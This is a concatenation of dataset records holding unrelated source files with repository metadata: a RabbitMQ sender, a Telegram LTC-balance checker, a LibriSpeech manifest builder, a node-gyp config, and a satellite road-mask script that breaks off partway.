if newState.attributes.get('velocity') is not None:
newVelocity = newState.attributes.get('velocity')
elif currentState is not None and currentState.attributes.get('velocity') is not None:
newVelocity = currentState.attributes.get('velocity')
else:
newVelocity = None
if newState.state is not None:
newStatus = newState.state
else:
newStatus = currentState.state
# Create device_tracker.meta entity
hass.states.set(metatrackerName, newStatus, {
'friendly_name': newFriendlyName,
'entity_picture': newEntityPicture,
'source_type': newSource,
'battery': newBattery,
'gps_accuracy': newgpsAccuracy,
'latitude': newLatitude,
'longitude': newLongitude,
'velocity': newVelocity,
'update_source': triggeredEntity,
'show_last_changed': 'true'
})
| [
"12pita3naru@gmail.com"
] | 12pita3naru@gmail.com |
2b7a2c90bae671eb7855d16bc122acb73d9dafdc | a16f3f148455395596405fd7b11df62932f3937d | /career/rabbit/send2.py | 8701013073a594d7af24fe5ebb5aa71253c6e7c5 | [] | no_license | wyzane/skill-general | 8eeb5984c42ec2bcb59c634c7f7bca7c2476977b | 6e5a498dd5b63117a6a20aa81ac67a1999d8ac21 | refs/heads/master | 2020-05-22T21:51:18.061659 | 2019-10-18T15:56:26 | 2019-10-18T15:56:26 | 186,535,789 | 0 | 0 | null | 2019-10-18T15:52:54 | 2019-05-14T03:12:39 | Python | UTF-8 | Python | false | false | 619 | py | import sys
import pika
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
durable=True) # 消息持久化,重启rabbitmq消息不会丢失
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
routing_key='task_queue',
body=message,
properties=pika.BasicProperties(
delivery_mode=2, # 使消息持久化
))
print("send message: ", message)
conn.close()
| [
"wyzane1207@163.com"
] | wyzane1207@163.com |
b852ccf65e8fa19c3838b3e99c7100195235941a | e3f894dae716fbd1edde76c1789bb0dc25e601c9 | /balance.py | ac1da60722c6bc866032d133bdc8682dd450c637 | [] | no_license | Wizard-C/Telegram_mining_bot | f2c244b75a83da4ffdce7ac249d0f3bdc653b179 | 45ecfc67836f8e171cf09af842feaf5b0673e634 | refs/heads/master | 2022-11-25T05:44:05.626025 | 2020-07-20T16:59:10 | 2020-07-20T16:59:10 | 279,015,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,133 | py | import sqlite3
import time
from telethon import TelegramClient
from telethon import sync, events
import re
import json
db = sqlite3.connect('Account.db')
cur = db.cursor()
number_of_iterations = 2
total_amount = 0
try:
for i in range(1, number_of_iterations+1):
cur.execute(f"SELECT PHONE FROM Account WHERE ID = '{i}'")
Phone = str(cur.fetchone()[0])
print("Аккаунт: " + Phone, end=', ')
cur.execute(f"SELECT NAME FROM Account WHERE ID = '{i}'")
Name = str(cur.fetchone()[0])
print(Name)
cur.execute(f"SELECT API_ID FROM Account WHERE ID = '{i}'")
api_id = str(cur.fetchone()[0])
cur.execute(f"SELECT API_HASH FROM Account WHERE ID = '{i}'")
api_hash = str(cur.fetchone()[0])
session = str("anon" + str(i))
client = TelegramClient(session, api_id, api_hash)
client.start()
dialogues = client.get_dialogs()
for dialog in dialogues:
if dialog.title == 'LTC Click Bot':
dialog_LTC = dialog
break
client.send_message('LTC Click Bot', "/balance")
time.sleep(1)
messages = client.get_messages(dialog_LTC, limit=1)
for msg in messages:
message_text = str(msg.message)
balance_text = message_text.replace('Available balance: ', '')
balance_text = balance_text.replace(' LTC', '')
print(balance_text, ' LTC')
print('{:.2f}'.format(float(balance_text)*3107), ' RUB')
amount_now = float(balance_text)
total_amount = '{: .8f}'.format(total_amount + amount_now)
time.sleep(1)
if i == number_of_iterations:
print("\nВсего добыто LTC: ", str(total_amount))
print("Всего добыто RUB: ", '{: .2f}'.format(float(total_amount)*3107))
break
except:
print("\nВсего добыто LTC: ", str(total_amount))
print("Всего добыто RUB: ", '{: .2f}'.format(float(total_amount)*3107))
print('Ошибка, преждевременный выход из цикла') | [
"BlueSkyC@mail.ru"
] | BlueSkyC@mail.ru |
97beac3332700720db92a2a52b747a1469c1e80d | 027bcc7f55e1c545856f388d14d6738c70700883 | /speech/data/ingest_librispeech.py | c01634ca64f71966dbe9618cb4d08cfb8e9b429d | [
"Apache-2.0"
] | permissive | robustfengbin/deepspeech | f3e6c2b80f87084d93cb707adc23605b5efcce3d | b3d430edb205efd43cb6601be8607e3c51619569 | refs/heads/master | 2021-01-11T10:56:42.901481 | 2016-12-10T22:32:02 | 2016-12-10T22:32:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,070 | py | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2015-2016 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import logging
import glob
import fnmatch
logging.basicConfig()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def write_manifest(output_file, *filenames):
""" Writes out a manifest file from a series of lists of filenames
"""
with open(output_file, "w") as fid:
for line in zip(*filenames):
fid.write(",".join(line) + "\n")
return True
def get_files(directory, pattern, recursive=True):
""" Return the full path to all files in directory matching the specified
pattern.
pattern should be a glob style pattern (e.g. "*.wav")
"""
# This yields an iterator which really speeds up looking through large, flat directories
if recursive is False:
it = glob.iglob(os.path.join(directory, pattern))
return it
# If we want to recurse, use os.walk instead
matches = list()
for root, dirnames, filenames in os.walk(directory):
matches.extend(map(lambda ss: os.path.join(root, ss),
fnmatch.filter(filenames, pattern)))
return matches
def main(input_directory, transcript_directory, manifest_file):
""" Finds all .flac files recursively in input_directory, then extracts the
transcript from the nearby .trans.txt file and stores it in
transcript_directory. Writes a manifest file referring to each .flac file
and its paired transcript.
Arguments:
input_directory (string): Path to librispeech directory
transcript_directory (string): Path to directory in which to write
individual transcript files.
manifest_file (string): Path to manifest file to output.
"""
def librispeech_flac_filename(filestr):
parts = filestr.split("-")
return os.path.join(input_directory, parts[0], parts[1],
"{}.flac".format(filestr))
if not os.path.isdir(input_directory):
raise IOError("Data directory does not exist! {}".format(input_directory))
if not os.path.exists(transcript_directory):
os.makedirs(transcript_directory)
transcript_files = get_files(input_directory, pattern="*.txt")
if len(transcript_files) == 0:
logger.error("No .txt files were found in {}".format(input_directory))
return
logger.info("Beginning audio conversions")
audio_files = list()
txt_files = list()
for ii, tfile in enumerate(transcript_files):
# transcript file specifies transcript and flac filename for all librispeech files
logger.info("Converting audio corresponding to transcript "
"{} of {}".format(ii, len(transcript_files)))
with open(tfile, "r") as fid:
lines = fid.readlines()
for line in lines:
filestr, transcript = line.split(" ", 1)
try:
flac_file = librispeech_flac_filename(filestr)
except IndexError: # filestr is not the format we are expecting
print("filestr of unexpected formatting: {}".format(filestr))
print("error in {}".format(tfile))
continue
txt_file = os.path.join(transcript_directory,
"{}.txt".format(filestr))
# Write out short transcript file
with open(txt_file, "w") as fid:
fid.write(transcript.strip())
# Add to output lists to be written to manifest
audio_files.append(flac_file)
txt_files.append(txt_file)
logger.info("Writing manifest file to {}".format(manifest_file))
return write_manifest(manifest_file, audio_files, txt_files)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("manifest_file",
help="Output file that specifies the filename for each"
" output audio and transcript")
parser.add_argument("input_directory",
help="Directory containing librispeech flac files")
parser.add_argument("transcript_directory",
help="Directory to write transcript .txt files")
args = parser.parse_args()
main(args.input_directory,
args.transcript_directory,
args.manifest_file)
| [
"tyler@nervanasys.com"
] | tyler@nervanasys.com |
e323a7b70656382f9009af5a4de1ccca1ecb70fb | d7c1ca8277cdbc946ba82c5f0aef86d22d2c43f0 | /node_modules/bignum/build/config.gypi | 07b2952803e45d3ca36d9ccf361791210b4646a7 | [] | no_license | raullorenzo/Pallier | 61dc4a6f18933b690e95714acca063f86649af88 | cb1fe99573b2f03af635ad3f38a333d5af9de981 | refs/heads/master | 2020-06-30T00:28:26.611530 | 2016-11-21T20:11:29 | 2016-11-21T20:11:29 | 74,401,484 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,905 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"host_arch": "x64",
"icu_data_file": "icudt56l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt56l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "56",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/raul/.node-gyp/5.9.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/raul/.npm-init.js",
"userconfig": "/Users/raul/.npmrc",
"node_version": "5.9.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"progress": "true",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/raul/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/3.8.9 node/v5.9.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/2n/k3nmlyq90mdgdmtfhjx7rs980000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
| [
"raul.lorenzo.67@gmail.com"
] | raul.lorenzo.67@gmail.com |
1d88980928f6cf4ef48ca98063f11a2b663fe55c | 55020ba15fecc1b6cafb86b949dec7f0441c785b | /code/road_mask.py | 297ca6e8cae008d8d42b775ff40a3db37ae1f2d6 | [] | no_license | MingZx8/satellite | ec2386d67a615cc4031bfe811c2552d0fb163727 | 557d641cf826e65cfaa4861da36397191d12fa46 | refs/heads/master | 2023-04-20T00:32:02.749423 | 2021-05-10T15:29:50 | 2021-05-10T15:29:50 | 238,007,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,078 | py | # Python version: Python3.6
# @Author: MingZZZZZZZZ
# @Date created: 2020
# @Date modified: 2020
# Description:
import pandas as pd
import geopandas as gpd
from shapely.geometry import Polygon, LineString, Point
from shapely import wkt
import math
import numpy as np
import cv2
import difflib
import os
from sklearn.cluster import KMeans
from convert import point2pixel, get_scale, dist_in_image, dist2point
from generateLSD import generate
import random
def get_geo_index(point, gdf):
return gdf.geometry.distance(point).idxmin()
def pt2line(pt1, pt2):
return LineString(((pt1[0], pt1[1]), (pt2[0], pt2[1])))
def get_angle(k1, k2, pair=True):
angle = math.atan((k1 - k2) / (1 + k1 * k2)) / math.pi * 360
if pair:
return 0 if abs(angle) > 3 else 1
return 1 if abs(angle) < 45 else 0
def get_perpendicular_point(x0, y0, a, c):
return (x0 + a * y0 - a * c) / (a ** 2 + 1), (a ** 2 * x0 + a * x0 + c) / (a ** 2 + 1)
def get_vertical_point(pt, a, c):
x = (pt[0] + a * pt[1] - a * c) / (a ** 2 + 1)
return x, a * x + c
def get_parallel_dist(pt0, pt1, pt2):
try:
a = (pt2[1] - pt1[1]) / (pt2[0] - pt1[0])
except ZeroDivisionError:
return abs(pt0[0] - pt1[0]), pt1[0], pt0[1]
c = pt1[1] - pt1[0] * a
dist = ((a * pt0[0] - pt0[1] + c) ** 2 / (a ** 2 + 1)) ** 0.5
x, y = get_vertical_point(pt0, a, c)
return dist, x, y
def get_overlap_ratio(df_segment, fix_step, target_id, candidate_id):
target = df_segment.loc[target_id]
candidate = df_segment.loc[candidate_id]
a = candidate.slope
c = candidate.intercept
# sample points on the target line
slope = df_segment.loc[target_id, 'slope']
intercept = df_segment.loc[target_id, 'intercept']
pt_ls = []
left = right = 1
pt_x_r = target.x1 + (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
pt_x_l = target.x1 - (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
if pt_x_r > max(target.x1, target.x2):
right = 0
if pt_x_l < min(target.x1, target.x2):
left = 0
pt_x = target.x1
while left or right:
pt_ls.append((pt_x, slope * pt_x + intercept))
pt_x = pt_x + right * (fix_step ** 2 / (slope ** 2 + 1)) ** 0.5 - left * (
fix_step ** 2 / (slope ** 2 + 1)) ** 0.5
if pt_x > max(target.x1, target.x2):
right = 0
if pt_x < min(target.x1, target.x2):
left = 0
vertical_point_ls = [_ for _ in [get_vertical_point(i, a, c) for i in pt_ls]
if min(candidate.x1, candidate.x2) <= _[0] <= max(candidate.x1, candidate.x2)]
try:
overlap_ratio = len(vertical_point_ls) / len(pt_ls) # overlap ratio
except ZeroDivisionError:
return 0
return 0 if overlap_ratio < 0.2 else 1
def get_distance(df_segment, line1_id, line2_id, resolution):
line1 = df_segment.loc[line1_id]
line2 = df_segment.loc[line2_id]
a = line2.slope
c = line2.intercept
pt1_x, pt1_y = line1.x1, line1.y1
pt2_x = (pt1_x + a * pt1_y - a * c) / (a ** 2 + 1)
pt2_y = a * pt2_x + c
return ((pt1_y - pt2_y) ** 2 + (pt1_x - pt2_x) ** 2) ** 0.5 * resolution
def get_trans_dist(center_line, pt0, resolution):
dict_line = {}
tmp_dist = []
for i in range(len(center_line[:-1])):
pt10 = center_line[i]
pt20 = center_line[i + 1]
dist, x, y = get_parallel_dist(pt0, pt10, pt20)
if min(pt10[0], pt20[0]) <= x <= max(pt10[0], pt20[0]) and \
min(pt10[1], pt20[1]) <= y <= max(pt10[1], pt20[1]):
tmp = dist * resolution
tmp_dist.append(tmp)
dict_line[i] = [x, y, tmp]
x, y = [(x, y) for i, (x, y, dist) in dict_line.items() if dist == min(tmp_dist)][0]
return x - pt0[0], y - pt0[1]
def string_similar(s1, s2):
return difflib.SequenceMatcher(None, s1, s2).quick_ratio()
def main(
file_path,
latitude,
longitude,
show_selected_area=False,
show_filtered_segment=False,
show_paired_segment=False,
show_mask=False,
geo_file='/media/ming/data/GeospatialData/ONrte/ONrte.shp'
):
'''
:param file_path: str
:param latitude: float
:param longitude: float
:param show_selected_area: boolean
:param show_filtered_segment: boolean
:param show_paired_segment: boolean
:param show_mask: boolean
:param centreline_label: str
the label name of the road
:param path: str
where the files are located
:param geo_file: str
where the geospatial data is located
:return: pandas.Dataframe
inludes road width, road length and road mask in form shapely.geometry.Polygon
'''
resolution = get_scale(latitude)
# file loading#################################################################################
file_name = file_path.split('/')[-1]
img_file = '{}/image/image.png'.format(file_path)
geo_path = os.path.join('/'.join(geo_file.split('/')[:-1]), 'SubGeoFolder')
try:
os.mkdir(geo_path)
except FileExistsError:
pass
geo_selected_name = '{}/{}'.format(geo_path, file_name)
geo_line_name = '{}/line.csv'.format(file_path)
line_name = '{}/lsd.txt'.format(file_path)
geo_selected_file = '{}/geo_val.csv'.format(file_path)
# initiate a fake polygon, in order to fill the dataframe with the same format data
default_polygon = Polygon([(0, 0), (0, 0), (0, 0)])
# load image
img = cv2.imread(img_file)
img_mask = img.copy()
img_width = img.shape[1]
img_height = img.shape[0]
n = max(img_width // 1096, img_height // 1096)
resize_size = (img_width // n, img_height // n)
# generate lsd file
if not os.path.exists(line_name):
print('generate line segment...')
generate(file_path)
# build line segment dataframe###################################################
df_segment = pd.read_csv(line_name, sep=' ', header=None).rename(
columns=dict(enumerate(['x1', 'y1', 'x2', 'y2', 'width', 'p', '-log_nfa']))).drop(columns=7)
df_segment['slope'] = (df_segment.y2 - df_segment.y1) / (df_segment.x2 - df_segment.x1)
df_segment['intercept'] = df_segment.y1 - df_segment.slope * df_segment.x1
df_segment['width'] = ((df_segment.y2 - df_segment.y1) ** 2 + (df_segment.x2 - df_segment.x1) ** 2) ** 0.5
# split/read geospatial info
print('loading geospatial file...')
if os.path.exists(geo_selected_name):
file_ls = os.listdir(geo_selected_name)
for file in file_ls:
if '.csv' in file:
gdf = pd.read_csv(os.path.join(geo_selected_name, file))
try:
gdf['geometry'] = gdf['geometry'].apply(wkt.loads)
except KeyError:
pass
break
if '.shp' in file:
gdf = gpd.read_file(os.path.join(geo_selected_name, file))
break
if gdf.empty:
return
try:
gdf.set_index('flag', inplace=True)
except KeyError:
gdf = gpd.read_file(geo_selected_file)
point = Point(longitude, latitude).buffer(0.01)
gdf['selected'] = gdf.geometry.apply(point.intersects)
gdf = gdf[gdf.selected]
gdf['flag'] = gdf.index
gdf.to_file(geo_selected_name)
else:
gdf = gpd.read_file(geo_file)
point = Point(longitude, latitude).buffer(0.01)
gdf['selected'] = gdf.geometry.apply(point.intersects)
gdf = gdf[gdf.selected]
gdf['flag'] = gdf.index
if gdf.empty:
os.mkdir(geo_selected_name)
gdf.to_csv('{}/{}'.format(geo_selected_name, file_name + '.csv'))
return
else:
gdf.to_file(geo_selected_name)
print('done')
# ############################################################################################
# get 1. fixed distance
# 2. depends on nearby shapefile line
# display all lines in the image
dlat_m = resolution * img_height / 2
dlon_m = resolution * img_width / 2
delta = dist2point(dlat_m, dlon_m, latitude)
pt1 = (longitude - delta[1], latitude - delta[0])
pt2 = (longitude + delta[1], latitude - delta[0])
pt3 = (longitude - delta[1], latitude + delta[0])
pt4 = (longitude + delta[1], latitude + delta[0])
poly_img = Polygon([pt1, pt2, pt4, pt3])
gdf['display'] = gdf.geometry.apply(poly_img.intersects)
gdf_line = gdf[gdf['display']]
gdf_line.fillna('None', inplace=True)
gdf_line.to_csv(geo_line_name)
if gdf_line.empty:
return
# ichoose the nearest line to the centre point
nearest_index = get_geo_index(Point(longitude, latitude), gdf_line)
gdf_line_selected = gdf_line[gdf_line['STREETNAME'] == gdf_line.loc[nearest_index, 'STREETNAME']]
index_ls = gdf_line_selected.index.to_list()
index_ls.remove(nearest_index)
nearest_line_ls = [nearest_index]
len_tmp = len(nearest_line_ls)
head = gdf_line_selected.loc[nearest_index, 'FROMNODE']
tail = gdf_line_selected.loc[nearest_index, 'TONODE']
node_ls = [head, tail]
while len(nearest_line_ls) == len_tmp:
len_tmp += 1
for i in index_ls:
head = gdf_line_selected.loc[i, 'FROMNODE']
tail = gdf_line_selected.loc[i, 'TONODE']
if head in node_ls or tail in node_ls:
nearest_line_ls.append(i)
index_ls.remove(i)
node_ls.append(head)
node_ls.append(tail)
break
gdf_line_selected = gdf_line_selected.loc[nearest_line_ls, :]
# creating center lines for all gdf_line
center_line_dict = {}
for line_index in gdf_line.index:
geo_info = gdf_line.loc[line_index]
center_line_geo = geo_info.geometry.xy
center_line_geo = list(zip(center_line_geo[0], center_line_geo[1]))
center_line = list(map(lambda x: point2pixel(latitude, longitude, x[1], x[0], resolution), center_line_geo))
center_line = list(map(lambda x: (x[1] + img_width / 2, x[0] + img_height / 2), center_line))
center_line_dict[line_index] = center_line
for line_index in gdf_line_selected.index:
geo_info = gdf_line.loc[line_index]
# print(line_index)
print('creating detecting area...')
# default road width setting
lane_limit = 3 if (geo_info.CARTO < 4 and geo_info.SPD_KM < 70) else \
2.2 if geo_info.CARTO == 5 else \
1.5 if geo_info.CARTO == 6 else \
4 if geo_info.ONEWAY else 5
offset = 3.5 * lane_limit / resolution
# the center line
center_line = center_line_dict[line_index]
center_line_slope = []
for i in range(len(center_line) - 1):
try:
center_line_slope.append(
(center_line[i][1] - center_line[i + 1][1]) / (center_line[i][0] - center_line[i + 1][0]))
except ZeroDivisionError:
pass
# creating selected area
# boundary including other lines
boundary_area = 0
for other_line_index in center_line_dict:
if other_line_index == line_index:
continue
other_line = center_line_dict[other_line_index]
other_line_buffer = LineString(other_line).buffer(3.5 / resolution, cap_style=2, join_style=2)
if boundary_area == 0:
boundary_area = other_line_buffer
else:
boundary_area = boundary_area.union(other_line_buffer)
if boundary_area == 0:
boundary_area = default_polygon
def get_mask(selected_area, selected_area1, side='', signal=1):
# draw selected area
overlay = img.copy()
if type(selected_area) == Polygon:
try:
center_line_buffer = list(
zip(map(int, selected_area.exterior.coords.xy[0]),
map(int, selected_area.exterior.coords.xy[1])))
cv2.drawContours(
overlay,
[np.array(center_line_buffer)],
-1,
(130, 197, 82),
thickness=cv2.FILLED)
except AttributeError:
pass
else:
new_selected_area = selected_area
for poly in selected_area:
if not LineString(center_line).intersects(poly):
new_selected_area = new_selected_area.difference(poly)
else:
poly_buffer = list(
zip(map(int, poly.exterior.coords.xy[0]),
map(int, poly.exterior.coords.xy[1])))
cv2.drawContours(
overlay,
[np.array(poly_buffer)],
-1,
(130, 197, 82),
thickness=cv2.FILLED)
selected_area = new_selected_area
line_length = 0
for i in range(len(center_line[:-1])):
cv2.line(
overlay,
tuple(map(int, center_line[i])),
tuple(map(int, center_line[i + 1])),
(0, 0, 127),
thickness=5
)
line_length += dist_in_image(center_line[i], center_line[i + 1], img_height, img_width) * resolution
cv2.addWeighted(
overlay, 0.5, img, 0.5, 0, overlay
)
overlay = cv2.resize(overlay, resize_size, interpolation=cv2.INTER_CUBIC)
if show_selected_area:
cv2.imshow(' ', overlay)
cv2.waitKey(0)
cv2.destroyAllWindows()
# filter out line segment out of the selected area and its length should be larger than 3 meters
df_segment['geometry'] = df_segment.apply(lambda x: pt2line((x.x1, x.y1), (x.x2, x.y2)), axis=1)
df_segment['filtered'] = df_segment.geometry.apply(selected_area.intersects)
df_segment['filtered2'] = df_segment['slope'].apply(
lambda x: sum([get_angle(x, i, pair=False) for i in center_line_slope]) > 0)
pair_name = '{}/lsd_pair_{}{}.csv'.format(file_path, line_index, side)
pair_refine_name = '{}/lsd_refine_{}{}.csv'.format(file_path, line_index, side)
mask_name = '{}/mask_{}{}.png'.format(file_path, line_index, side)
# TODO: remove google map logo
# minimum line segment setting
df_segment_filter = df_segment[df_segment.filtered & (df_segment.width > (
5 / resolution if geo_info.CARTO < 4 else
3 / resolution if geo_info.CARTO in [5, 6] else
4 / resolution))
& df_segment.filtered2]
if show_filtered_segment:
img_copy = img.copy()
for i in df_segment_filter.index:
cv2.line(img_copy,
tuple(map(int, (df_segment_filter.loc[i, 'x1'], df_segment_filter.loc[i, 'y1']))),
tuple(map(int, (df_segment_filter.loc[i, 'x2'], df_segment_filter.loc[i, 'y2']))),
(23, 117, 187),
thickness=3
)
img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
cv2.imshow(' ', img_copy)
cv2.waitKey(0)
cv2.destroyAllWindows()
# ###############################################################################################
print('pairing segments...')
# pair by slope
if os.path.exists(pair_name):
df_segment_pair = pd.read_csv(pair_name, index_col=0)
else:
df_segment_pair = pd.DataFrame(columns=df_segment_filter.index)
for i in df_segment_filter.index:
for j in df_segment_filter.index.drop(i):
df_segment_pair.loc[i, j] = get_angle(df_segment_filter.loc[i, 'slope'],
df_segment_filter.loc[j, 'slope'])
df_segment_pair.to_csv(pair_name)
# refining the pairs
print('refining...')
fix_step = df_segment_filter.width.mean() / 10
if os.path.exists(pair_refine_name):
df_segment_pair = pd.read_csv(pair_refine_name, index_col=0)
else:
for col in df_segment_pair.columns:
for row in df_segment_pair.index:
poly = Polygon(
[(df_segment.loc[int(row)].x1, df_segment.loc[int(row)].y1),
(df_segment.loc[int(row)].x2, df_segment.loc[int(row)].y2),
(df_segment.loc[int(col)].x1, df_segment.loc[int(col)].y1),
(df_segment.loc[int(col)].x2, df_segment.loc[int(col)].y2)]
)
df_segment_pair.loc[row, col] = get_overlap_ratio(df_segment, fix_step, int(row), int(col)) \
and get_overlap_ratio(df_segment, fix_step, int(col), int(row)) \
and df_segment_pair.loc[row, col]
df_segment_pair.to_csv(pair_refine_name)
# get distance for each pair
dist_dict = {}
for col in df_segment_pair.columns:
for row in df_segment_pair.index:
if df_segment_pair.loc[row, col] == 1:
df_segment_pair.loc[row, col] = get_distance(df_segment, int(row), int(col), resolution)
if df_segment_pair.loc[row, col] <= 3 or df_segment_pair.loc[row, col] >= 3 * 7:
df_segment_pair.loc[row, col] = 0
else:
dist_dict[(row, col)] = df_segment_pair.loc[row, col]
# show paired segments
if show_paired_segment:
pair_ls_all = []
for col in df_segment_pair.columns:
for row in df_segment_pair.index:
try:
if df_segment_pair.loc[row, col] > 0 and df_segment_pair.loc[int(col), str(row)] > 0:
pair_ls_all.append(int(row))
pair_ls_all.append(int(col))
except KeyError:
if df_segment_pair.loc[row, col] > 0 and df_segment_pair.loc[col, row] > 0:
pair_ls_all.append(int(row))
pair_ls_all.append(int(col))
img_copy = img.copy()
for i in set(pair_ls_all):
cv2.line(img_copy,
tuple(map(int, (df_segment_filter.loc[i, 'x1'], df_segment_filter.loc[i, 'y1']))),
tuple(map(int, (df_segment_filter.loc[i, 'x2'], df_segment_filter.loc[i, 'y2']))),
(253, 200, 84),
thickness=3
)
img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
cv2.imshow(' ', img_copy)
cv2.waitKey(0)
cv2.destroyAllWindows()
############################################################################################
# clustering
print('clustering...')
dist_ls = np.array(list(dist_dict.values())).reshape(-1, 1)
SSE = []
for k in range(1, 9):
model = KMeans(k)
try:
model.fit(dist_ls)
except ValueError:
break
SSE.append(model.inertia_)
# plt.plot(list(range(1, 9)), SSE)
# plt.show()
for i in range(len(SSE) - 1):
if SSE[i] - SSE[i + 1] < 10:
k = i + 1
break
# print(line_length)
model = KMeans(k)
try:
model.fit(dist_ls)
except ValueError:
return (default_polygon, 0, line_length) if side else (
default_polygon, default_polygon, 0, 0, line_length)
# print(model.cluster_centers_)
# print('distance: ', max(model.cluster_centers_))
dist_label = list(model.cluster_centers_).index(max(model.cluster_centers_))
dist_labels = [i for i, _ in enumerate(list(model.labels_)) if _ == dist_label]
##################################################################################
# show pair with road width
img_copy = img.copy()
for i in range(len(center_line[:-1])):
cv2.line(
img_copy,
tuple(map(int, center_line[i])),
tuple(map(int, center_line[i + 1])),
(0, 0, 127),
thickness=5
)
for i in dist_labels:
color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
pt1 = int(list(dist_dict.keys())[i][0])
pt2 = int(list(dist_dict.keys())[i][1])
for pt in [pt1, pt2]:
cv2.line(img_copy,
tuple(map(int, (df_segment_filter.loc[pt, 'x1'], df_segment_filter.loc[pt, 'y1']))),
tuple(map(int, (df_segment_filter.loc[pt, 'x2'], df_segment_filter.loc[pt, 'y2']))),
color,
thickness=3
)
img_copy = cv2.resize(img_copy, resize_size, interpolation=cv2.INTER_CUBIC)
if show_paired_segment:
cv2.imshow(' ', img_copy)
cv2.waitKey(0)
cv2.destroyAllWindows()
##########################################################################################
# determine a mask
# one side of center line
line1_dist = []
line2_dist = []
for i in dist_labels:
lines = list(dist_dict.keys())[i]
line1 = df_segment.loc[lines[0]]
line2 = df_segment.loc[int(lines[1])]
linestring1 = LineString([(line1.x1, line1.y1), (line1.x2, line1.y2)])
linestring2 = LineString([(line2.x1, line2.y1), (line2.x2, line2.y2)])
pt1 = Point((line1.x1 + line1.x2) / 2, (line1.y1 + line1.y2) / 2)
pt2 = Point((line2.x1 + line2.x2) / 2, (line2.y1 + line2.y2) / 2)
if selected_area1.intersects(linestring1) and not selected_area1.intersects(linestring2):
line1_dist.append(LineString(center_line).distance(pt1))
line2_dist.append(LineString(center_line).distance(pt2))
elif selected_area1.intersects(linestring2) and not selected_area1.intersects(linestring1):
line1_dist.append(LineString(center_line).distance(pt2))
line2_dist.append(LineString(center_line).distance(pt1))
elif selected_area1.intersects(linestring1):
line1_dist.append(max(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
line2_dist.append(min(LineString(center_line).distance(pt1), LineString(center_line).distance(pt2)))
else:
